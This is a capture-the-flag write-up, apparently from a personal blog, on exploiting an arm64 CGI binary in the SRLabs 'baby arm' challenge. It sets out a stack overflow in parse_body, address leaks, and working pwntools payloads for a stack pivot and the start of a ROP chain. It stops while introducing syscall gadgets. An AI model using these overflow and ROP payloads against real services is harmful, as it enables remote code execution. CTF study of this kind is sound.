ElBlo
[pwn] SRLabs CTF: baby arm
url: https://hackingchallenge.srlabs.de/challenges
Description
The challenge is served by an arm64 CGI-bin program. It’s a C program that parses the request body as key=value pairs. It then prints a greeting for every name=something pair that appears in the request body.
TL;DR (skip if you don’t want spoilers)
The key-value pairs are copied out of the buffer into two arrays (keys, values). You can exploit a buffer overflow to control where the key gets copied, but the target has to be “close” in the stack. You also cannot write NUL-bytes, nor &, nor =.
If you provide the maximum number of key-value pairs (0x34), you will still have plenty of space in the buffer and the stack address will be leaked into x7.
Using the buffer overflow, overwrite some values on the stack to make a rop chain to pivot the stack onto the value in x7. From there, continue ropping until you get what you want.
Program Analysis.
main disassembly
Disassembling the main function with ghidra has some problems, so feel free to skip reading it.
int main(void) {
undefined *puVar1;
int cmp;
ssize_t read_n;
undefined8 unaff_x19;
char *keys;
undefined8 unaff_x20;
char *values_iter;
undefined8 unaff_x21;
undefined8 unaff_x22;
undefined8 unaff_x23;
undefined8 unaff_x24;
undefined8 unaff_x29;
undefined8 unaff_x30;
undefined auStack_60000 [393216];
bool found_name;
undefined *global_data;
char *values_start;
global_data = (undefined *)register0x00000008;
do {
puVar1 = global_data;
*(undefined8 *)(puVar1 + -0xfc00) = 0;
global_data = puVar1 + -0x10000;
} while (puVar1 + -0x10000 != auStack_60000);
*(undefined8 *)(puVar1 + -0x15950) = unaff_x29;
*(undefined8 *)(puVar1 + -0x15948) = unaff_x30;
*(undefined8 *)(puVar1 + -0x15940) = unaff_x19;
*(undefined8 *)(puVar1 + -0x15938) = unaff_x20;
*(long *)(puVar1 + 0x4fff8) = __stack_chk_guard;
read_n = read(0,puVar1 + 0x1d378,0x32c80);
puts("Content-type: text/html\n");
if ((int)read_n < 1) {
puts("<h1>Please provide your name with the name= parameter.</h1>");
}
else {
*(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
*(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
keys = puVar1 + -0x15908;
values_start = puVar1 + 0x3d38;
*(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
*(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
found_name = false;
parse_body(puVar1 + 0x1d378,keys,values_start,puVar1 + -0x1590c);
values_iter = values_start;
do {
while( true ) {
if (*keys == '\0') goto LAB_00400628;
cmp = strncmp(keys,"name",4);
if (cmp != 0) break;
keys = keys + 2000;
printf("<h1>Hello, %s!</h1>\n",values_iter);
values_iter = values_iter + 2000;
found_name = true;
if (keys == values_start) goto LAB_00400628;
}
keys = keys + 2000;
values_iter = values_iter + 2000;
} while (keys != values_start);
LAB_00400628:
if (found_name) {
unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
}
else {
puts("<h1>What is your name?</h1>");
unaff_x21 = *(undefined8 *)(puVar1 + -0x15930);
unaff_x22 = *(undefined8 *)(puVar1 + -0x15928);
unaff_x23 = *(undefined8 *)(puVar1 + -0x15920);
unaff_x24 = *(undefined8 *)(puVar1 + -0x15918);
}
}
if (*(long *)(puVar1 + 0x4fff8) - __stack_chk_guard == 0) {
return 0;
}
*(undefined8 *)(puVar1 + -0x15930) = unaff_x21;
*(undefined8 *)(puVar1 + -0x15928) = unaff_x22;
*(undefined8 *)(puVar1 + -0x15920) = unaff_x23;
*(undefined8 *)(puVar1 + -0x15918) = unaff_x24;
/* WARNING: Subroutine does not return */
__stack_chk_fail(&__stack_chk_guard,0,puVar1 + 0x4e6b0,
*(long *)(puVar1 + 0x4fff8) - __stack_chk_guard);
}
- If you provide no input, it will print a message.
- There are three arrays: keys, values, and read_buffer.
  - keys comes first, with 0x34 entries of 2000 bytes each. Used to store the keys of the body.
  - values is next, with 0x34 entries of 2000 bytes each. Used to store the values associated with the keys.
  - read_buffer is where our input gets copied to; it has a size of 0x32c80 bytes.
- After reading the input, main calls parse_body, passing the three arrays.
- When that’s done, main will iterate over keys and values, and print all the values whose key has name as a prefix.
- At the end, if no name was printed, the program will print <h1>What is your name?</h1>.
Now, let’s look at parse_body.
parse_body disassembly
void parse_body(char* body,char* keys,char *values, undefined4* param_4) {
char* src;
size_t len;
long i;
int count;
char* saveptr = NULL;
char* kv_ptr = NULL;
char dst[32] = {0};
char* key_ptr = NULL;
char* value_ptr = NULL;
uint64_t stack_canary = __stack_chk_guard;
char c;
src = strtok_r(body, "&", &saveptr);
if (src == NULL) {
*param_4 = 0xffffffff;
kv_ptr = NULL;
} else {
count = 0;
do {
kv_ptr = src;
key_ptr = keys;
value_ptr = values;
len = simd_strlen(src);
// This can overflow dst and overwrite key_ptr and value_ptr
strncpy(&dst, src, len & 0xffffffff);
i = 0;
do {
// Copy key into key_ptr (points to keys)
c = src[i];
if (c == '=' || c == '\0') break;
key_ptr[i] = c;
i += 1;
src = kv_ptr;
} while (i != 2000);
// Copy value into value_ptr (points to values)
kv_ptr = strchr(&dst, L'=');
if (kv_ptr != NULL) {
strncpy(value_ptr, kv_ptr + 1, 2000);
value_ptr[1999] = '\0';
}
count += 1;
src = strtok_r(NULL, "&", &saveptr);
keys = keys + 2000;
values = values + 2000;
kv_ptr = src;
} while (count != 0x34 && src != NULL);
}
if (stack_canary - __stack_chk_guard == 0) {
return;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail(&__stack_chk_guard,0,stack_canary - __stack_chk_guard);
}
- The function parse_body is in charge of parsing the input buffer into the key-value pair arrays.
  - It uses strtok_r to split the input on & chars.
  - For every token (a chunk delimited by &), it will:
    - Copy the addresses of the current keys and values entries onto the stack (key_ptr and value_ptr).
    - Copy the data from the read buffer, up to the next &, into a stack buffer (dst).
    - Copy from the read buffer into the address pointed to by key_ptr, until it finds either a NUL-byte or an =.
    - Look for an = in the dst buffer and strncpy from the position right after it into the address pointed to by value_ptr, up to 2000 chars.
    - Note that both key_ptr and value_ptr can be overwritten if our input is too long.
  - This is repeated 0x34 times, or until we don’t have any more & characters.
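To make the overflow concrete, here is a minimal Python model of the relevant part of parse_body’s frame. It is only a sketch: it assumes key_ptr and value_ptr sit right after the 32-byte dst buffer (which matches the gdb stack dump further down), it ignores everything else in the frame, and simulate_token is a name I made up for illustration. The pointer values are the ones from my local QEMU run.

```python
import struct

DST_SIZE = 32  # char dst[32] in the decompiled parse_body


def simulate_token(token: bytes, key_ptr: int, value_ptr: int):
    """Model the unbounded copy into dst; return (key_ptr, value_ptr, key) afterwards.

    Assumed frame layout: dst (32 bytes) | key_ptr (8 bytes) | value_ptr (8 bytes).
    """
    frame = bytearray(DST_SIZE) + struct.pack('<QQ', key_ptr, value_ptr)
    # strncpy(dst, src, strlen(src)) copies the whole token and adds no terminator.
    # The model stops at the end of the two pointers; the real copy would keep going.
    n = min(len(token), len(frame))
    frame[:n] = token[:n]
    new_key_ptr, new_value_ptr = struct.unpack_from('<QQ', frame, DST_SIZE)
    # The key is whatever comes before the first '=' in the token.
    key = token.split(b'=', 1)[0]
    return new_key_ptr, new_value_ptr, key


if __name__ == '__main__':
    short = simulate_token(b'name=test', 0x550079b3b8, 0x55007b49f8)
    long_ = simulate_token(b'\x84\x06\x40=' + b'a' * 28 + b'\xd8\xb2',
                           0x550079b3b8, 0x55007b49f8)
    print(hex(short[0]), hex(long_[0]))
```

A short token leaves both pointers alone, while a 34-byte token replaces the two lowest bytes of key_ptr, which is exactly the primitive used in the rest of this write-up.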
Other details
- The binary is not PIE. It is always loaded at the same address, but the stack is randomized.
- We have some control over the environment variables, for example, the user agent that we set in our request will end up as an env var.
- The read call for reading the request body is very large, but in reality we will only be able to read ~32k bytes.
- There’s a limit of 0x34 key-value pairs that will be processed.
Exploit Ideas
With all these details, an idea of a possible attack would be to use the write-what-where primitive to change some of the return addresses to start ropping, and then pivot our stack to the read_buffer to do a longer rop-chain. Sadly, our read_buffer is too far away from where key_ptr points to, so we will need to figure out a way to work around that.
Another challenge is that, on each iteration of the loop in parse_body, the key and value ptrs increment by 2000, so the pointer that we are modifying keeps changing.
Let’s set up everything so we can start playing with this challenge :)
Remote Setup, with requests library.
Trying this challenge is super easy, we just need to make a simple web request:
import requests

def run_remote(payload):
    url = 'http://5.75.229.171:1337/cgi-bin/pwn.cgi'
    return requests.post(url, data=payload).content
>>> run_remote(b'name=test')
b'<h1>Hello, test!</h1>\n'
You can also change the request headers, but this seems to be good enough for now.
Local Setup with usermode QEMU.
Given that I don’t have an arm64 machine, the easiest way to study the binary locally is to use usermode QEMU. This is a QEMU mode in which userspace code gets emulated, while kernel code gets routed to the real linux kernel.
Note that usermode QEMU doesn’t provide a security boundary or isolation in any way. Don’t use it to run untrusted binaries.
~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 pwn.cgi
Content-type: text/html
<h1>Hello, test!</h1>
Limitations
Note that this setup has various limitations:
- It doesn’t seem to have aslr, which causes the stack to always be in the same place.
  - This can be helpful to iterate fast and get an exploit working, but our solution needs to work with aslr eventually.
  - Note that we can simulate some randomness by messing with environment variables when we start the program.
- The memory mappings might not be the same ones as in the real program. QEMU doesn’t provide an easy way of printing the memory mappings either.
  - One option that I found useful was to check /proc/pid/maps on the QEMU process: the program was loaded on the lower end of the address space.
  - Some failures might not show up correctly. For example, if the program tries to write outside of the low-memory area, it might cause issues with QEMU or might not be reported correctly.
- This is not the same setup as with the CGI-bin script.
  - Our input is actually an HTTP request. We have control over some headers that end up in the environment variables.
  - The output of the program must start with a content type header: Content-Type: text/plain\n\n.
  - Apache reads our entire request in one go and sends it to the program.
    - For example, one way to defeat aslr could be to make the program print a stack address, and then override a return address to execute main again, causing it to read our input again, with the same memory layout. This wouldn’t work on a CGI-bin script.
strace
Usermode QEMU also has an option for logging the system calls:
~/ctf/srelabs/pwn$ echo -n "name=test" | qemu-aarch64 -strace pwn.cgi
10903 brk(NULL) = 0x000000000049a000
10903 brk(0x000000000049ab78) = 0x000000000049ab78
10903 set_tid_address(4825296,4821024,4825280,4825536,4778064,4827120) = 10903
10903 set_robust_list(4825312,24,4825312,1,0,4825360) = -1 errno=38 (Function not implemented)
10903 Unknown syscall 293
10903 uname(0x5500800078) = 0
10903 prlimit64(0,3,0,365080609256,4827160,88) = 0
10903 readlinkat(AT_FDCWD,"/proc/self/exe",0x00000055007ff130,4096) = 38
10903 getrandom(4820672,8,1,4825088,4786664,0) = 8
10903 brk(0x00000000004bbb78) = 0x00000000004bbb78
10903 brk(0x00000000004bc000) = 0x00000000004bc000
10903 mprotect(0x000000000048e000,16384,PROT_READ) = 0
10903 read(0,0x7cd468,208000) = 9
10903 newfstatat(1,"",0x000000550079a638,0x1000) = 0
Content-type: text/html
10903 write(1,0x49b020,24) = 24
10903 write(1,0x49b020,1) = 1
<h1>Hello, test!</h1>
10903 write(1,0x49b020,22) = 22
10903 exit_group(0)
gdb
Another good thing about usermode qemu: it lets us hook a debugger to our process.
Make sure you have gdb-multiarch installed
$ sudo apt install gdb-multiarch
Launch qemu with the gdb flag:
$ echo -n "name=marco" | env -i qemu-aarch64 -g 1234 ./pwn.cgi
And then launch gdb and connect to it:
$ gdb-multiarch ./pwn.cgi
...
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c
pwntools
Using pwntools to work on the exploit will be a real time saver.
Given that our payload cannot be dynamic, the setup to run it with pwntools is easy:
$ python3 -m pip install pwntools
import pwn
pwn.context.update(arch='aarch64', os='linux')
pwn.context.log_level = 'critical'
def run(payload):
    with pwn.process(['qemu-aarch64', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

def run_with_strace(payload):
    with pwn.process(['qemu-aarch64', '-strace', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()

def run_with_gdb(payload):
    with pwn.process(['qemu-aarch64', '-g', '1234', './pwn.cgi'], env={}) as target:
        target.send(payload)
        return target.recvall()
Improving our understanding of the problem
We have decompiled the program, have a reasonable understanding of how it works, and have the tools to play with it locally. Let’s see what we can learn about it.
Confirming the dst buffer size.
First, let’s double check the size of the dst buffer in parse_body:
>>> from pwnlib.util.cyclic import cyclic, cyclic_find
>>> print(run(b'name=' + cyclic(10)).decode())
Content-type: text/html
<h1>Hello, aaaabaaaca!</h1>
>>> print(run(b'name=' + cyclic(100)).decode())
Content-type: text/html
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Let’s see with strace:
>>> print(run_with_strace(b'name=' + cyclic(100)).decode())
(...)
11337 write(1,0x49b020,24) = 24
11337 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=NULL} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Sadly, this is one of the issues I mentioned earlier about usermode QEMU: the segmentation fault is happening in a memory region outside the program’s allowed address space, and QEMU is not reporting it. Let’s shrink our payload until we see a crashing address:
>>> print(run_with_strace(b'name=' + cyclic(34)).decode())
(...)
Content-type: text/html
11354 write(1,0x49b020,24) = 24
11354 write(1,0x49b020,1) = 1
--- SIGSEGV {si_signo=SIGSEGV, si_code=1, si_addr=0x0000696161616861} ---
qemu: uncaught target signal 11 (Segmentation fault) - core dumped
With the address, we can now get the offset:
>>> pwn.p64(0x0000696161616861)
b'ahaaai\x00\x00'
>>> cyclic_find(b'ahaaai\x00\x00')
27
This means that our buffer has a size of 27+5 = 32 bytes. ✅︎
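If you don’t have pwntools at hand, the same offset can be recovered with the standard library only. The sketch below regenerates a de Bruijn pattern over the lowercase alphabet with subsequences of length 4, which I am assuming is what cyclic produces by default (the first 10 bytes match the cyclic(10) output above). The helper names pattern and offset_of are mine, not part of any library.

```python
import string
import struct
from itertools import islice


def de_bruijn(alphabet: bytes, n: int):
    """Yield the symbols of a de Bruijn sequence with window size n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int) -> bytes:
    """First `length` bytes of the lowercase, window-4 pattern."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), 4), length))


def offset_of(fault_addr: int, length: int = 100) -> int:
    """Offset of the 4 lowest bytes of fault_addr inside the pattern (-1 if absent)."""
    needle = struct.pack('<Q', fault_addr)[:4]
    return pattern(length).find(needle)


if __name__ == '__main__':
    off = offset_of(0x0000696161616861)
    print(off, off + len(b'name='))
```

Adding the 5 bytes of the name= prefix to the offset gives the distance from the start of dst to the overwritten pointer.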
Print the keys pointers.
From reading the decompiled source code, we know that it will write the keys from src, and the values from the dst buffer after the first =, with a strncpy. No NUL-byte gets copied into our dst buffer (everything is copied up to, but not including, a NUL-byte or an &), so if our key-value pair fills exactly 32 bytes, the values array should receive our value plus whatever follows dst on the stack, up to the first NUL-byte. Furthermore, if we use name as the key, it will be printed out by the program at the end.
This is the code I am talking about:
// Copy value into value_ptr (points to values)
kv_ptr = strchr(&dst, L'=');
if (kv_ptr != NULL) {
strncpy(value_ptr, kv_ptr + 1, 2000);
value_ptr[1999] = '\0';
}
Let’s see what happens:
>>> run(b'name=' + b'a' * (32-5))
b'Content-type: text/html\n\n<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xb3y!</h1>\n'
>>> x = b'\xb8\xb3y' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
'0x79b3b8'
After our name (all a’s), there are some extra bytes. Those would be the keys_ptr value up to the first NUL-byte. QEMU usermode places the stack at something like 0x5500aabbcc, so we only see the lowest 3 bytes. If we run it against the real website, we get a better value.
>>> run_remote(b'name=' + b'a' * (32-5))
b'<h1>Hello, aaaaaaaaaaaaaaaaaaaaaaaaaaa\xb8\xe0d\xc5\xff\xff!</h1>\n'
>>> x = b'\xb8\xe0d\xc5\xff\xff' + b'\x00' * 8
>>> hex(pwn.u64(x[:8]))
'0xffffc564e0b8'
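The manual decoding above can be wrapped in a small helper. This is just a sketch using the standard library: decode_leak is a hypothetical name, and it assumes the response has exactly the shape shown above (the Hello prefix, our 27 filler bytes, the leaked bytes, then !</h1>).

```python
import struct

PREFIX = b'<h1>Hello, '
SUFFIX = b'!</h1>'


def decode_leak(line: bytes, filler: bytes = b'a' * 27) -> int:
    """Extract the pointer bytes printed right after our filler and decode them."""
    start = line.index(PREFIX) + len(PREFIX) + len(filler)
    end = line.rindex(SUFFIX)
    raw = line[start:end]
    # The copy stopped at the first NUL byte, so pad back to 8 bytes (little endian).
    return struct.unpack('<Q', raw[:8].ljust(8, b'\x00'))[0]


if __name__ == '__main__':
    remote = b'<h1>Hello, ' + b'a' * 27 + b'\xb8\xe0d\xc5\xff\xff!</h1>\n'
    print(hex(decode_leak(remote)))
```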
Note that we can use the same name multiple times, and thus, leak all the addresses from the keys array:
def leak_keys_addresses():
    payload = b'name=' + b'a' * 27
    payloads = [payload] * 0x35  # one more for good measure.
    payload = b'&'.join(payloads)
    response = run(payload)  # run() already returns the raw bytes
    for line in response.split(b'\n'):
        if b'a' * 27 not in line:
            continue
        line = line[38:-6]  # Take out the 38-byte prefix and these 6 chars: !</h1>
        ptr = line + b'\x00' * 8
        ptr = pwn.u64(ptr[:8])
        print(hex(ptr))
>>> leak_keys_addresses()
0x79b3b8
0x79bb88
0x79c358
(...)
0x7b3a58
0x7b4228
And we can see that each of them is 2000 bytes apart:
>>> 0x79bb88 - 0x79b3b8
2000
✅︎
Analyzing the memory layout with gdb.
We can launch gdb and stop at the beginning of parse_body to analyze the parameters.
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) b parse_body
Breakpoint 1 at 0x400868
(gdb) c
Continuing.
Breakpoint 1, 0x0000000000400868 in parse_body ()
(gdb) p /x $x0
$1 = 0x55007ce038
(gdb) p /x $x1
$2 = 0x550079b3b8
(gdb) p /x $x2
$3 = 0x55007b49f8
(gdb) p /x $x3
$4 = 0x550079b3b4
(gdb) p /x $sp
$5 = 0x550079b2d0
x0 is our read buffer.
x1 is the beginning of the keys array.
x2 is the beginning of the values array.
I am not clear on what x3 is used for.
(gdb) p /x $x1 + (2000 * 0x34)
$6 = 0x55007b49f8
(gdb) p /x $x2 + (2000 * 0x34)
$7 = 0x55007ce038
Also, the values array starts right where the keys array ends, and the input buffer starts right where the values array ends.
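The layout can be recomputed from the keys address alone. A small sketch (layout is a made-up helper name; the entry size and count come from the decompiled code, and the base address is the one from this gdb session):

```python
ENTRY_SIZE = 2000  # bytes per key or value entry
MAX_PAIRS = 0x34   # number of entries in each array


def layout(keys_base: int) -> dict:
    """Addresses of the three back-to-back arrays, given where keys starts."""
    array_size = ENTRY_SIZE * MAX_PAIRS
    values_base = keys_base + array_size
    read_buffer = values_base + array_size
    return {'keys': keys_base, 'values': values_base, 'read_buffer': read_buffer}


if __name__ == '__main__':
    for name, addr in layout(0x550079b3b8).items():
        print(f'{name:12s} {addr:#x}')
```

This is handy later on: once a keys address is known (for example through the leak), the read buffer address follows from it.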
This is the code at the beginning of parse_body:
(gdb) x /20i parse_body
0x400860 <parse_body>: stp x29, x30, [sp, #-160]!
0x400864 <parse_body+4>: adrp x4, 0x491000 <tunable_list+1320>
=> 0x400868 <parse_body+8>: movi v0.4s, #0x0
0x40086c <parse_body+12>: mov x29, sp
The stack frame takes 160 bytes, and x29 and x30 are stored on top.
Something that also interests us, is the function epilogue, to see how the values from the stack are restored and what we have control over.
0x400998 <parse_body+312>: ldp x19, x20, [sp, #16]
0x40099c <parse_body+316>: ldp x21, x22, [sp, #32]
0x4009a0 <parse_body+320>: ldp x23, x24, [sp, #48]
0x4009a4 <parse_body+324>: ldp x29, x30, [sp], #160
0x4009a8 <parse_body+328>: ret
To get a complete view, let’s set a breakpoint in the middle of the function and analyze the stack.
(gdb) x /20i $pc
=> 0x4008f4 <parse_body+148>: ldr x1, [sp, #136]
0x4008f8 <parse_body+152>: strb w0, [x1, x2]
0x4008fc <parse_body+156>: add x2, x2, #0x1
0x400900 <parse_body+160>: cmp x2, #0x7d0
This is where we store the c character from the key into the value pointed by key_ptr, which lives in sp + 136 (0x88).
Now, let’s print the stack contents (with some notes):
(gdb) x /40gx $sp
0x550079b2d0: 0x000000550079b370 0x00000000004005d8 x29, x30
0x550079b2e0: 0x000000550079b3b8 0x00000055007b49f8 x19, x20
0x550079b2f0: 0x0000000000458270 0x00000055007b49f8 x21, x22
0x550079b300: 0x0000000000458278 0x0000000000000000 x23, x24
0x550079b310: 0x0000000000000018 0x00000000004925c8
0x550079b320: 0x0000000000493c30 0x00000055007ce042
0x550079b330: 0x00000055007ce038 0x72616d3d656d616e dst
0x550079b340: 0x0000000000006f63 0x0000000000000000
0x550079b350: 0x0000000000000000 0x000000550079b3b8 keys_ptr (sp + 0x88)
0x550079b360: 0x00000055007b49f8 0xa36829a47092db00 values_ptr, stack canary
0x550079b370: 0x0000005500800cc0 0x0000000000400a64 main's stack.
Exploiting the buffer overflow (no aslr)
In this run, the value of keys_ptr is 0x550079b3b8, and parse_body’s return address is stored at 0x550079b2d8.
This means that if we can overwrite the two least-significant bytes of keys_ptr with b2d8, the key bytes will be written on top of the saved return address, and we should be able to jump to wherever we want.
At the beginning of the main function, there’s a call to puts at address 0x400684:
if (read_bytes < 1) {
puts("<h1>Please provide your name with the name= parameter.</h1>");
}
Remember: we need to provide a key=value pair. The key will be copied to wherever keys_ptr is pointing, and we can overwrite keys_ptr by providing a long value.
Here we want the key to be 0x400684, and the value to overflow the two least-significant bytes of keys_ptr with b2d8.
>>> payload = b'\x84\x06\x40=' + b'a' * 28 + b'\xd8\xb2'
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'
Success! ✅︎
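Since we will be writing several of these pairs, it helps to have a tiny builder. The sketch below is my own helper (build_pair is not part of pwntools): it pads the pair to the 32 bytes of dst, appends the bytes that land on keys_ptr, and rejects the bytes we cannot send.

```python
FORBIDDEN = b'\x00&='  # bytes we cannot place in a key or in the overflow
DST_SIZE = 32          # size of dst, so keys_ptr starts at offset 32


def build_pair(data: bytes, target_low: bytes, filler: bytes = b'a') -> bytes:
    """Return a key=value pair that writes `data` where keys_ptr ends up pointing.

    `target_low` holds the new low bytes of keys_ptr, in little-endian order.
    """
    for name, blob in (('data', data), ('target_low', target_low)):
        if any(b in FORBIDDEN for b in blob):
            raise ValueError(f'{name} contains a NUL, & or = byte')
    pad = DST_SIZE - len(data) - 1  # -1 for the '=' separator
    if pad < 0:
        raise ValueError('data does not fit in dst')
    return data + b'=' + filler * pad + target_low


if __name__ == '__main__':
    print(build_pair(b'\x84\x06\x40', (0xb2d8).to_bytes(2, 'little')))
```

With the values from this run it produces the same payload as the one typed by hand above.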
Note that we had to guess two bytes to put in the keys_ptr address. This will be problematic when we have to deal with aslr. But let’s ignore the elephant in the room for a while, and let’s think about how to exploit this issue.
We can see that if we can modify the x30 register on the stack, we can also modify the other registers (x19…x24, x29), and almost everything that is “close” in the stack, like main’s return address.
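How close is “close”? Because we only replace the two lowest bytes of keys_ptr, the upper bytes always come from the pointer of the current iteration, which grows by 2000 on every pair. A rough sketch with the addresses from this run (both helper names are mine):

```python
ENTRY_SIZE = 2000


def overwrite_low16(ptr: int, low16: int) -> int:
    """Pointer value after replacing its two least-significant bytes."""
    return (ptr & ~0xffff) | low16


def reachable_pairs(keys_base: int, target: int, max_pairs: int = 0x34) -> list:
    """Indices of the pairs whose key pointer shares its upper bytes with target."""
    return [i for i in range(max_pairs)
            if (keys_base + i * ENTRY_SIZE) >> 16 == target >> 16]


if __name__ == '__main__':
    print(hex(overwrite_low16(0x550079b3b8, 0xb2d8)))
    print(reachable_pairs(0x550079b3b8, 0x550079b2d8))
```

In this layout only the first ten pairs can be redirected to parse_body’s frame with a two-byte overwrite; after that the pointer crosses into the next 64 KiB window.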
Stack Pivot
We also have a buffer in memory with arbitrary data. If we could pivot the stack to our buffer, we can chain any number of rop gadgets and take over from there.
Using ropper to find gadgets
There are a lot of tools to search for rop gadgets, let’s use ropper.
$ python3 -m pip install ropper
$ ropper -f pwn.cgi --search "mov sp"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov sp
[INFO] File: pwn.cgi
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000040e408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x60; ret;
0x0000000000448d74: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x29, x30, [sp], #0x30; ret;
0x0000000000441adc: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldr x23, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
0x000000000044aed8: mov sp, x29; ldr x19, [sp, #0x10]; ldp x29, x30, [sp], #0x30; ret;
(Side note and useful tip: % works as a wildcard, and ? works as a single-character wildcard.)
All of the gadgets move x29 into sp, so we need to modify the value of x29 in memory.
Of those gadgets, the first one gives us the most control (least stack usage, most registers loaded).
So let’s pick that one (address 0x440408), overwrite x30 with it, and put an address inside our read buffer in x29.
The stack slots that we want to change end in 0xb2d8 (x30) and 0xb2d0 (x29), respectively.
Now, we know that our read buffer is at 0x55007ce038, and the value stored for x29 is 0x550079b370, so we need to change 3 bytes in total.
We also need to figure out what to put there. We can pad the message with 0s just so the calculations are easier. We could also use a rop sled such that no matter where we land, we will eventually rop our way towards our destination.
Keep in mind that in aarch64, the stack pointer must be aligned to 16 bytes.
>>> hex(0x55007ce038 + 0x58)
'0x55007ce090'
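A candidate pivot address has to satisfy two things: it must be 16-byte aligned, and the bytes we write over the saved x29 must not contain a NUL, & or =. A quick sanity check could look like this (check_pivot is a hypothetical helper; the 3 writable bytes are the ones that differ between the saved x29 and the read buffer in this run):

```python
FORBIDDEN = b'\x00&='


def check_pivot(read_buffer: int, offset: int, writable_bytes: int = 3):
    """Return (address, is_aligned, is_sendable) for read_buffer + offset."""
    addr = read_buffer + offset
    aligned = addr % 16 == 0
    # Only the lowest bytes are overwritten; the rest comes from the saved x29.
    low = addr.to_bytes(8, 'little')[:writable_bytes]
    sendable = not any(b in FORBIDDEN for b in low)
    return addr, aligned, sendable


if __name__ == '__main__':
    addr, aligned, sendable = check_pivot(0x55007ce038, 0x58)
    print(hex(addr), aligned, sendable)
```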
def rop():
    keyvals = [
        b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
        b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
    ]
    payload = b'&'.join(keyvals)
    payload += b'\x00' * (0x58 - len(payload))
    elf = pwn.ELF('./pwn.cgi')
    rop = pwn.ROP(elf)
    rop.raw(0xdeadbeef) # x29
    rop.raw(0x00400684) # x30
    rop.raw(0xdeadbeef) # x19
    rop.raw(0xdeadbeef) # x20
    rop.raw(0xdeadbeef) # x21
    rop.raw(0xdeadbeef) # x22
    rop.raw(0xdeadbeef) # x23
    rop.raw(0xdeadbeef) # x24
    payload += rop.chain()
    return payload
>>> payload = rop()
>>> payload
b'\x08\x04D=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd8\xb2&\x90\xe0|=aaaaaaaaaaaaaaaaaaaaaaaaaaaa\xd0\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\x84\x06@\x00\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00\xef\xbe\xad\xde\x00\x00\x00\x00'
>>> run(payload)
b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\nqemu: uncaught target signal 11 (Segmentation fault) - core dumped\n'
The address of the function to print the string was only present in our buffer, well after the end of the initial payload. This means that we were successful in doing a stack pivot and executing from there.
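For reference, the 0x40 bytes consumed by the pivot gadget can also be packed without pwntools. A minimal sketch, assuming the register order implied by the gadget at 0x440408 (x29 and x30 first, then x19 to x24); pivot_frame is a made-up name and 0xdeadbeef is just filler:

```python
import struct

# Order in which the pivot gadget reads registers from the new stack.
PIVOT_REGS = ('x29', 'x30', 'x19', 'x20', 'x21', 'x22', 'x23', 'x24')


def pivot_frame(filler: int = 0xdeadbeef, **regs: int) -> bytes:
    """Pack the 8 qwords loaded by the pivot gadget; unset registers get filler."""
    unknown = set(regs) - set(PIVOT_REGS)
    if unknown:
        raise ValueError(f'registers not loaded by this gadget: {sorted(unknown)}')
    return b''.join(struct.pack('<Q', regs.get(reg, filler)) for reg in PIVOT_REGS)


if __name__ == '__main__':
    frame = pivot_frame(x30=0x400684)  # return into the puts call in main
    print(len(frame), frame.hex())
```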
Building a rop-chain
Now that we can execute stuff out of our buffer, we can start building a rop chain that allows us to execute arbitrary code. Ideally, we would just want to open the flag and print it, but it seems easier to first add a bit more flexibility by allowing for arbitrary code execution.
Some alternatives:
- mprotect our own stack mapping, allowing for RWX permissions.
- mprotect the binary’s mappings, allowing for RWX permissions + copying our code there.
- mmap something new, and copying our code there.
It all depends on what rop gadgets we can find. To me it was easier to go with the second option, so let’s go with that.
Making Linux system calls in aarch64 requires us to set the system call number in x8 and issue an svc #0 instruction.
Here are some rop gadgets with svc #0:
